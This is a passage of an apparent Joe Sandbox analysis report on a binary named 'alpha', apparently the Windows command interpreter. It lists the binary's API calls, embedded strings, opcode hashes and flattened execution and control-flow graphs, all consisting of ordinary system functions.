                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD58C
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CC98D7
                                      Strings
                                      Similarity
                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                      • String ID: Software\Classes
                                      • API String ID: 2714550308-1656466771
                                      APIs
                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCA0FC
                                        • Part of subcall function 00007FF755CAD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD46E
                                        • Part of subcall function 00007FF755CAD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD485
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD4EE
                                        • Part of subcall function 00007FF755CAD3F0: iswspace.MSVCRT ref: 00007FF755CAD54D
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD569
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD58C
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCA1FB
                                      Strings
                                      Similarity
                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                      • String ID: Software\Classes
                                      • API String ID: 2714550308-1656466771
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: ConsoleTitle
                                      • String ID: -
                                      • API String ID: 3358957663-3695764949
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _wcsnicmpswscanf
                                      • String ID: :EOF
                                      • API String ID: 1534968528-551370653
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _wcsnicmp
                                      • String ID: /-Y
                                      • API String ID: 1886669725-4274875248
                                      • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                      • Instruction ID: 04e514233eb96726ad0636311b3c86d25b527b44fa4672dc5cda1d9ae35c891f
                                      • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                      • Instruction Fuzzy Hash: F32171ABA0879781FA10AB029854178FAA0BB45FC8F999531DE9947B94DF3CE482D310
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 3$3
                                      • API String ID: 0-2538865259
                                      • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                      • Instruction ID: 6a1b9dc1803faafaf6e58c2a64f691cfc11a786924436772f77c7bc4760ac46e
                                      • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                      • Instruction Fuzzy Hash: 56013CFFD095838AF3597B60D8842B8FA60BF80F1DFDC4939C41E015A1DF2C6485A660
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06D6
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06F0
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB074D
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB0762
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                      • Instruction ID: 249c2fd2851999f46b1e78e4f027ebbc0ec1d47b42b9ae21bdae294c4d01dafb
                                      • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                      • Instruction Fuzzy Hash: 124168BBA0964386EA55AB10E44417EF7A4EF85F98BCC8038CA4E17794DF3DE840C760

                                      Execution Graph

                                      Execution Coverage:5.7%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:815
                                      Total number of Limit Nodes:27
                                       execution_graph (rendered graph flattened to text: each node is "<id> <module offset> [label]", each edge is "<src>-><dst>"; collapsed nodes carry a "N API calls" label instead of function names). This portion of the dump, for the module loaded at 00007FF755CA0000 in process 3, names the following functions in its node labels:
                                       • Process creation and token handling: CreateProcessW, CreateProcessAsUserW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, GetStartupInfoW, RevertToSelf, CloseHandle
                                       • Console: GetConsoleTitleW, SetConsoleTitleW, GetConsoleMode, SetConsoleMode, GetStdHandle, FlushConsoleInputBuffer, GetConsoleOutputCP, GetCPInfo
                                       • File and path: GetFullPathNameW, SearchPathW, GetFileAttributesW, GetFileType, NeedCurrentDirectoryForExePathW, SetFilePointer, SetErrorMode
                                       • Memory: GetProcessHeap, RtlFreeHeap, VirtualQuery, VirtualFree, malloc, memset, ??_V@YAXPEAX (decorated operator delete[])
                                       • Error handling and control flow: GetLastError, FormatMessageW, LocalFree, _setjmp, longjmp, _local_unwind, EnterCriticalSection, LeaveCriticalSection
                                       • CRT string and descriptor helpers: wcschr, wcsrchr, wcsspn, wcsncmp, _wcsicmp, _wcsnicmp, _wcsupr, towupper, lstrcmpW, _vsnwprintf, _get_osfhandle, _dup, _dup2, _close, _tell, _getch
19266 7ff755ccd343 19265->19266 19267 7ff755ccd3fc 166 API calls 19266->19267 19280 7ff755ccd34e 19267->19280 19268 7ff755ccd5c2 19268->19238 19269 7ff755ccd576 19270 7ff755ccd592 19269->19270 19283 7ff755ccd555 19269->19283 19271 7ff755cb3448 166 API calls 19270->19271 19274 7ff755ccd5a5 19271->19274 19272 7ff755ccd5c4 19276 7ff755cb3448 166 API calls 19272->19276 19273 7ff755ccd31c 166 API calls 19273->19268 19277 7ff755ccd5ba 19274->19277 19281 7ff755cb3448 166 API calls 19274->19281 19275 7ff755ccd541 19275->19270 19278 7ff755ccd546 19275->19278 19276->19268 19282 7ff755ccd36c 166 API calls 19277->19282 19278->19272 19278->19283 19279 7ff755cb3448 166 API calls 19279->19280 19280->19268 19280->19269 19280->19270 19280->19272 19280->19275 19280->19279 19280->19283 19284 7ff755ccd3fc 166 API calls 19280->19284 19281->19277 19282->19268 19283->19273 19284->19280 19286 7ff755ca745f 19285->19286 19287 7ff755ca7468 19285->19287 19286->19287 19288 7ff755ca7497 _wcsicmp 19286->19288 19289 7ff755cc48c8 _wcsicmp 19286->19289 19287->19161 19287->19165 19290 7ff755cb1ea0 8 API calls 19288->19290 19292 7ff755cc48ed CreateFileW 19289->19292 19291 7ff755ca74bd 19290->19291 19291->19292 19293 7ff755ca74c9 CreateFileW 19291->19293 19292->19293 19294 7ff755cc4929 19292->19294 19295 7ff755ca7501 _open_osfhandle 19293->19295 19296 7ff755cc4943 GetLastError 19293->19296 19294->19295 19295->19287 19297 7ff755ca7520 CloseHandle 19295->19297 19296->19287 19297->19287 19299->19170 19303 7ff755cc773c 19300->19303 19301 7ff755cc777d 19301->19196 19302 7ff755cb3448 166 API calls 19302->19303 19303->19301 19303->19302 19305 7ff755cc778c 166 API calls 19304->19305 19306 7ff755cc76fb 19305->19306 19307 7ff755cc771c 19306->19307 19308 7ff755cb3448 166 API calls 19306->19308 19307->19196 19309 7ff755cc7711 19308->19309 19310 7ff755cc778c 166 API calls 19309->19310 19310->19307 19312 7ff755cac486 19311->19312 19313 7ff755cac4c9 19311->19313 19314 7ff755cac48e wcschr 19312->19314 19318 
7ff755cac161 19312->19318 19316 7ff755caff70 2 API calls 19313->19316 19313->19318 19315 7ff755cac4ef 19314->19315 19314->19318 19317 7ff755cacd90 166 API calls 19315->19317 19316->19318 19324 7ff755cac4f9 19317->19324 19318->18775 19318->18782 19319 7ff755cac5bd 19320 7ff755cac541 19319->19320 19323 7ff755cab6b0 170 API calls 19319->19323 19320->19318 19322 7ff755caff70 2 API calls 19320->19322 19321 7ff755cad840 178 API calls 19321->19324 19322->19318 19323->19320 19324->19318 19324->19319 19324->19320 19324->19321 19326 7ff755cab018 19325->19326 19326->18813 19327->18813 19329 7ff755cb3bcf 19328->19329 19330 7ff755cb3bfe 19328->19330 19329->19330 19331 7ff755cb3bdc wcschr 19329->19331 19330->18886 19331->19329 19331->19330 19333 7ff755cb2f2a 19332->19333 19334 7ff755cb2f97 19332->19334 19335 7ff755cb823c 10 API calls 19333->19335 19334->19333 19336 7ff755cb2f9c wcschr 19334->19336 19338 7ff755cb2f56 19335->19338 19337 7ff755cb2fb6 wcschr 19336->19337 19339 7ff755cb2f5a 19336->19339 19337->19333 19337->19339 19338->19339 19340 7ff755cb3a0c 2 API calls 19338->19340 19342 7ff755cb8f80 7 API calls 19339->19342 19345 7ff755cbe4ec 19339->19345 19341 7ff755cb2fe0 19340->19341 19341->19339 19343 7ff755cb2fe9 wcsrchr 19341->19343 19344 7ff755cb2f83 19342->19344 19343->19339 19344->18886 19347 7ff755cc4621 19346->19347 19348 7ff755ca72de 19346->19348 19349 7ff755cc47e0 19347->19349 19351 7ff755cc447b longjmp 19347->19351 19356 7ff755cc4639 19347->19356 19357 7ff755cc475e 19347->19357 19350 7ff755ca72eb 19348->19350 19354 7ff755cc4530 19348->19354 19355 7ff755cc4467 19348->19355 19352 7ff755ca7348 168 API calls 19349->19352 19407 7ff755ca7348 19350->19407 19358 7ff755cc4492 19351->19358 19406 7ff755cc4524 19352->19406 19364 7ff755ca7348 168 API calls 19354->19364 19355->19350 19355->19358 19369 7ff755cc4475 19355->19369 19361 7ff755cc4695 19356->19361 19362 7ff755cc463e 19356->19362 19370 7ff755ca7348 168 API calls 19357->19370 19363 7ff755ca7348 168 API calls 19358->19363 
19360 7ff755ca7315 19422 7ff755ca73d4 19360->19422 19368 7ff755ca73d4 168 API calls 19361->19368 19362->19351 19372 7ff755cc4654 19362->19372 19376 7ff755cc44a8 19363->19376 19374 7ff755cc4549 19364->19374 19365 7ff755ca72b0 168 API calls 19371 7ff755cc480e 19365->19371 19366 7ff755ca7348 168 API calls 19366->19360 19393 7ff755cc469a 19368->19393 19369->19351 19369->19361 19370->19349 19371->18908 19378 7ff755ca7348 168 API calls 19372->19378 19373 7ff755cc45b2 19375 7ff755ca7348 168 API calls 19373->19375 19374->19373 19377 7ff755cc455e 19374->19377 19392 7ff755ca7348 168 API calls 19374->19392 19381 7ff755cc45c7 19375->19381 19385 7ff755ca7348 168 API calls 19376->19385 19388 7ff755cc44e2 19376->19388 19377->19373 19383 7ff755ca7348 168 API calls 19377->19383 19382 7ff755ca7323 19378->19382 19379 7ff755ca72b0 168 API calls 19387 7ff755cc4738 19379->19387 19380 7ff755cc46e1 19380->19379 19384 7ff755ca7348 168 API calls 19381->19384 19382->18908 19383->19373 19391 7ff755cc45db 19384->19391 19385->19388 19386 7ff755ca72b0 168 API calls 19389 7ff755cc44f1 19386->19389 19390 7ff755ca7348 168 API calls 19387->19390 19388->19386 19395 7ff755ca72b0 168 API calls 19389->19395 19390->19406 19394 7ff755ca7348 168 API calls 19391->19394 19392->19377 19393->19380 19398 7ff755cc46ea 19393->19398 19399 7ff755cc46c7 19393->19399 19396 7ff755cc45ec 19394->19396 19397 7ff755cc4503 19395->19397 19401 7ff755ca7348 168 API calls 19396->19401 19397->19382 19403 7ff755ca7348 168 API calls 19397->19403 19400 7ff755ca7348 168 API calls 19398->19400 19399->19380 19404 7ff755ca7348 168 API calls 19399->19404 19400->19380 19402 7ff755cc4600 19401->19402 19405 7ff755ca7348 168 API calls 19402->19405 19403->19406 19404->19380 19405->19406 19406->19365 19406->19382 19411 7ff755ca735d 19407->19411 19408 7ff755ca3278 166 API calls 19409 7ff755cc4820 longjmp 19408->19409 19410 7ff755cc4838 19409->19410 19412 7ff755ca3278 166 API calls 19410->19412 19411->19408 19411->19410 19411->19411 19421 
7ff755ca73ab 19411->19421 19413 7ff755cc4844 longjmp 19412->19413 19414 7ff755cc485a 19413->19414 19415 7ff755ca7348 166 API calls 19414->19415 19416 7ff755cc487b 19415->19416 19417 7ff755ca7348 166 API calls 19416->19417 19418 7ff755cc48ad 19417->19418 19419 7ff755ca7348 166 API calls 19418->19419 19420 7ff755ca72ff 19419->19420 19420->19360 19420->19366 19423 7ff755ca7401 19422->19423 19424 7ff755cc485a 19422->19424 19423->19382 19425 7ff755ca7348 168 API calls 19424->19425 19426 7ff755cc487b 19425->19426 19427 7ff755ca7348 168 API calls 19426->19427 19428 7ff755cc48ad 19427->19428 19429 7ff755ca7348 168 API calls 19428->19429 19430 7ff755cc48be 19429->19430 19430->19382 16763 7ff755cb8d80 16764 7ff755cb8da4 16763->16764 16765 7ff755cb8dbf Sleep 16764->16765 16766 7ff755cb8db6 16764->16766 16765->16764 16767 7ff755cb8ddb _amsg_exit 16766->16767 16773 7ff755cb8de7 16766->16773 16767->16773 16768 7ff755cb8e56 _initterm 16770 7ff755cb8e73 _IsNonwritableInCurrentImage 16768->16770 16769 7ff755cb8e3c 16777 7ff755cb37d8 GetCurrentThreadId OpenThread 16770->16777 16773->16768 16773->16769 16773->16770 16810 7ff755cb04f4 16777->16810 16779 7ff755cb3839 HeapSetInformation RegOpenKeyExW 16780 7ff755cbe9f8 RegQueryValueExW RegCloseKey 16779->16780 16781 7ff755cb388d 16779->16781 16783 7ff755cbea41 GetThreadLocale 16780->16783 16782 7ff755cb5920 VirtualQuery VirtualQuery 16781->16782 16784 7ff755cb38ab GetConsoleOutputCP GetCPInfo 16782->16784 16797 7ff755cb3919 16783->16797 16784->16783 16785 7ff755cb38f1 memset 16784->16785 16785->16797 16786 7ff755cb4d5c 391 API calls 16786->16797 16787 7ff755ca3240 166 API calls 16787->16797 16788 7ff755cbeb27 _setjmp 16788->16797 16789 7ff755cb3948 _setjmp 16789->16797 16790 7ff755cc8530 370 API calls 16790->16797 16791 7ff755cb01b8 6 API calls 16791->16797 16792 7ff755cb4c1c 166 API calls 16792->16797 16793 7ff755cadf60 481 API calls 16793->16797 16794 7ff755cbeb71 _setmode 16794->16797 16795 7ff755cb86f0 182 API calls 16795->16797 
16796 7ff755cb0580 12 API calls 16798 7ff755cb398b GetConsoleOutputCP GetCPInfo 16796->16798 16797->16780 16797->16786 16797->16787 16797->16788 16797->16789 16797->16790 16797->16791 16797->16792 16797->16793 16797->16794 16797->16795 16797->16796 16799 7ff755cb58e4 EnterCriticalSection LeaveCriticalSection 16797->16799 16801 7ff755cabe00 647 API calls 16797->16801 16802 7ff755cb58e4 EnterCriticalSection LeaveCriticalSection 16797->16802 16800 7ff755cb04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16798->16800 16799->16797 16800->16797 16801->16797 16803 7ff755cbebbe GetConsoleOutputCP GetCPInfo 16802->16803 16804 7ff755cb04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16803->16804 16805 7ff755cbebe6 16804->16805 16806 7ff755cabe00 647 API calls 16805->16806 16807 7ff755cb0580 12 API calls 16805->16807 16806->16805 16808 7ff755cbebfc GetConsoleOutputCP GetCPInfo 16807->16808 16809 7ff755cb04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16808->16809 16809->16797 16811 7ff755cb0504 16810->16811 16812 7ff755cb051e GetModuleHandleW 16811->16812 16813 7ff755cb054d GetProcAddress 16811->16813 16814 7ff755cb056c SetThreadLocale 16811->16814 16812->16811 16813->16811
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                      • API String ID: 3305344409-4288247545
                                      • Opcode ID: 3a658cc38ab97f116ce8e8e87b4ee7862caa448d1090e4e356381fbb7e19e6af
                                      • Instruction ID: 6cbda1688d9998ecbbdeea0667299a279aa58d082313e39f66873e59abce8305
                                      • Opcode Fuzzy Hash: 3a658cc38ab97f116ce8e8e87b4ee7862caa448d1090e4e356381fbb7e19e6af
                                      • Instruction Fuzzy Hash: D742B6ABA0868385EF50AB1198542B9E7A0EF85FACFCC4234D95E477D5DF7CE9448320

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 216 7ff755caaa54-7ff755caaa98 call 7ff755cacd90 219 7ff755cbbf5a-7ff755cbbf70 call 7ff755cb4c1c call 7ff755caff70 216->219 220 7ff755caaa9e 216->220 221 7ff755caaaa5-7ff755caaaa8 220->221 223 7ff755caacde-7ff755caad00 221->223 224 7ff755caaaae-7ff755caaac8 wcschr 221->224 229 7ff755caad06 223->229 224->223 226 7ff755caaace-7ff755caaae9 towlower 224->226 226->223 228 7ff755caaaef-7ff755caaaf3 226->228 231 7ff755caaaf9-7ff755caaafd 228->231 232 7ff755cbbeb7-7ff755cbbec4 call 7ff755cceaf0 228->232 233 7ff755caad0d-7ff755caad1f 229->233 235 7ff755cbbbcf 231->235 236 7ff755caab03-7ff755caab07 231->236 243 7ff755cbbec6-7ff755cbbed8 call 7ff755ca3240 232->243 244 7ff755cbbf43-7ff755cbbf59 call 7ff755cb4c1c 232->244 237 7ff755caad22-7ff755caad2a call 7ff755cb13e0 233->237 245 7ff755cbbbde 235->245 239 7ff755caab09-7ff755caab0d 236->239 240 7ff755caab7d-7ff755caab81 236->240 237->221 246 7ff755cbbe63 239->246 248 7ff755caab13-7ff755caab17 239->248 240->246 247 7ff755caab87-7ff755caab95 240->247 243->244 261 7ff755cbbeda-7ff755cbbee9 call 7ff755ca3240 243->261 244->219 256 7ff755cbbbea-7ff755cbbbec 245->256 259 7ff755cbbe72-7ff755cbbe88 call 7ff755ca3278 call 7ff755cb4c1c 246->259 252 7ff755caab98-7ff755caaba0 247->252 248->240 253 7ff755caab19-7ff755caab1d 248->253 252->252 257 7ff755caaba2-7ff755caabb3 call 7ff755cacd90 252->257 253->245 258 7ff755caab23-7ff755caab27 253->258 266 7ff755cbbbf8-7ff755cbbc01 256->266 257->219 272 7ff755caabb9-7ff755caabde call 7ff755cb13e0 call 7ff755cb33a8 257->272 258->256 263 7ff755caab2d-7ff755caab31 258->263 281 7ff755cbbe89-7ff755cbbe8c 259->281 276 7ff755cbbef3-7ff755cbbef9 261->276 277 7ff755cbbeeb-7ff755cbbef1 261->277 263->229 268 7ff755caab37-7ff755caab3b 263->268 266->233 268->266 269 7ff755caab41-7ff755caab45 268->269 273 7ff755cbbc06-7ff755cbbc2a call 7ff755cb13e0 269->273 274 7ff755caab4b-7ff755caab4f 269->274 305 7ff755caac75 272->305 306 7ff755caabe4-7ff755caabe7 
272->306 298 7ff755cbbc5a-7ff755cbbc61 273->298 299 7ff755cbbc2c-7ff755cbbc4c _wcsnicmp 273->299 279 7ff755caad2f-7ff755caad33 274->279 280 7ff755caab55-7ff755caab78 call 7ff755cb13e0 274->280 276->244 282 7ff755cbbefb-7ff755cbbf0d call 7ff755ca3240 276->282 277->244 277->276 290 7ff755cbbc66-7ff755cbbc8a call 7ff755cb13e0 279->290 291 7ff755caad39-7ff755caad3d 279->291 280->221 286 7ff755cbbe92-7ff755cbbeaa call 7ff755ca3278 call 7ff755cb4c1c 281->286 287 7ff755caacbe 281->287 282->244 312 7ff755cbbf0f-7ff755cbbf21 call 7ff755ca3240 282->312 340 7ff755cbbeab-7ff755cbbeb6 call 7ff755cb4c1c 286->340 295 7ff755caacc0-7ff755caacc7 287->295 319 7ff755cbbcc4-7ff755cbbcdc 290->319 320 7ff755cbbc8c-7ff755cbbcaa _wcsnicmp 290->320 300 7ff755caad43-7ff755caad49 291->300 301 7ff755cbbcde-7ff755cbbd02 call 7ff755cb13e0 291->301 295->295 309 7ff755caacc9-7ff755caacda 295->309 307 7ff755cbbd31-7ff755cbbd4f _wcsnicmp 298->307 299->298 313 7ff755cbbc4e-7ff755cbbc55 299->313 303 7ff755caad4f-7ff755caad68 300->303 304 7ff755cbbd5e-7ff755cbbd65 300->304 329 7ff755cbbd04-7ff755cbbd24 _wcsnicmp 301->329 330 7ff755cbbd2a 301->330 316 7ff755caad6a 303->316 317 7ff755caad6d-7ff755caad70 303->317 304->303 314 7ff755cbbd6b-7ff755cbbd73 304->314 323 7ff755caac77-7ff755caac7f 305->323 306->287 318 7ff755caabed-7ff755caac0b call 7ff755cacd90 * 2 306->318 325 7ff755cbbbc2-7ff755cbbbca 307->325 326 7ff755cbbd55 307->326 309->223 312->244 343 7ff755cbbf23-7ff755cbbf35 call 7ff755ca3240 312->343 315 7ff755cbbbb3-7ff755cbbbb7 313->315 331 7ff755cbbe4a-7ff755cbbe5e 314->331 332 7ff755cbbd79-7ff755cbbd8b iswxdigit 314->332 333 7ff755cbbbba-7ff755cbbbbd call 7ff755cb13e0 315->333 316->317 317->237 318->340 358 7ff755caac11-7ff755caac14 318->358 319->307 320->319 327 7ff755cbbcac-7ff755cbbcbf 320->327 323->287 335 7ff755caac81-7ff755caac85 323->335 325->221 326->304 327->315 329->330 341 7ff755cbbbac 329->341 330->307 331->333 332->331 337 7ff755cbbd91-7ff755cbbda3 iswxdigit 332->337 333->325 342 
7ff755caac88-7ff755caac8f 335->342 337->331 345 7ff755cbbda9-7ff755cbbdbb iswxdigit 337->345 340->232 341->315 342->342 347 7ff755caac91-7ff755caac94 342->347 343->244 355 7ff755cbbf37-7ff755cbbf3e call 7ff755ca3240 343->355 345->331 351 7ff755cbbdc1-7ff755cbbdd7 iswdigit 345->351 347->287 349 7ff755caac96-7ff755caacaa wcsrchr 347->349 349->287 354 7ff755caacac-7ff755caacb9 call 7ff755cb1300 349->354 356 7ff755cbbddf-7ff755cbbdeb towlower 351->356 357 7ff755cbbdd9-7ff755cbbddd 351->357 354->287 355->244 361 7ff755cbbdee-7ff755cbbe0f iswdigit 356->361 357->361 358->340 362 7ff755caac1a-7ff755caac33 memset 358->362 363 7ff755cbbe11-7ff755cbbe15 361->363 364 7ff755cbbe17-7ff755cbbe23 towlower 361->364 362->305 365 7ff755caac35-7ff755caac4b wcschr 362->365 366 7ff755cbbe26-7ff755cbbe45 call 7ff755cb13e0 363->366 364->366 365->305 367 7ff755caac4d-7ff755caac54 365->367 366->331 368 7ff755caad72-7ff755caad91 wcschr 367->368 369 7ff755caac5a-7ff755caac6f wcschr 367->369 371 7ff755caaf03-7ff755caaf07 368->371 372 7ff755caad97-7ff755caadac wcschr 368->372 369->305 369->368 371->305 372->371 373 7ff755caadb2-7ff755caadc7 wcschr 372->373 373->371 374 7ff755caadcd-7ff755caade2 wcschr 373->374 374->371 375 7ff755caade8-7ff755caadfd wcschr 374->375 375->371 376 7ff755caae03-7ff755caae18 wcschr 375->376 376->371 377 7ff755caae1e-7ff755caae21 376->377 378 7ff755caae24-7ff755caae27 377->378 378->371 379 7ff755caae2d-7ff755caae40 iswspace 378->379 380 7ff755caae42-7ff755caae49 379->380 381 7ff755caae4b-7ff755caae5e 379->381 380->378 382 7ff755caae66-7ff755caae6d 381->382 382->382 383 7ff755caae6f-7ff755caae77 382->383 383->259 384 7ff755caae7d-7ff755caae97 call 7ff755cb13e0 383->384 387 7ff755caae9a-7ff755caaea4 384->387 388 7ff755caaea6-7ff755caaead 387->388 389 7ff755caaebc-7ff755caaef8 call 7ff755cb0a6c call 7ff755caff70 * 2 387->389 388->389 390 7ff755caaeaf-7ff755caaeba 388->390 389->323 397 7ff755caaefe 389->397 390->387 390->389 397->281
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                      • String ID: :$:$:$:ON$OFF
                                      • API String ID: 972821348-467788257
                                      • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                      • Instruction ID: 6d8c5db5e443c0b85de01439dc228832c7d86a3fdcf941a2386b4f2445fa7f0b
                                      • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                      • Instruction Fuzzy Hash: 3422A1AFA0868386FB54BF219814279EA91EF45F9CFCC8535C90E47795EF7CA840C260

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 398 7ff755cb51ec-7ff755cb5248 call 7ff755cb5508 GetLocaleInfoW 401 7ff755cbef32-7ff755cbef3c 398->401 402 7ff755cb524e-7ff755cb5272 GetLocaleInfoW 398->402 405 7ff755cbef3f-7ff755cbef49 401->405 403 7ff755cb5295-7ff755cb52b9 GetLocaleInfoW 402->403 404 7ff755cb5274-7ff755cb527a 402->404 408 7ff755cb52de-7ff755cb5305 GetLocaleInfoW 403->408 409 7ff755cb52bb-7ff755cb52c3 403->409 406 7ff755cb5280-7ff755cb5286 404->406 407 7ff755cb54f7-7ff755cb54f9 404->407 410 7ff755cbef61-7ff755cbef6c 405->410 411 7ff755cbef4b-7ff755cbef52 405->411 406->407 412 7ff755cb528c-7ff755cb528f 406->412 407->401 415 7ff755cb5321-7ff755cb5343 GetLocaleInfoW 408->415 416 7ff755cb5307-7ff755cb531b 408->416 413 7ff755cbef75-7ff755cbef78 409->413 414 7ff755cb52c9-7ff755cb52d7 409->414 410->413 411->410 417 7ff755cbef54-7ff755cbef5f 411->417 412->403 418 7ff755cbef7a-7ff755cbef7d 413->418 419 7ff755cbef99-7ff755cbefa3 413->419 414->408 420 7ff755cbefaf-7ff755cbefb9 415->420 421 7ff755cb5349-7ff755cb536e GetLocaleInfoW 415->421 416->415 417->405 417->410 418->408 422 7ff755cbef83-7ff755cbef8d 418->422 419->420 423 7ff755cbefbc-7ff755cbefc6 420->423 424 7ff755cbeff2-7ff755cbeffc 421->424 425 7ff755cb5374-7ff755cb5396 GetLocaleInfoW 421->425 422->419 426 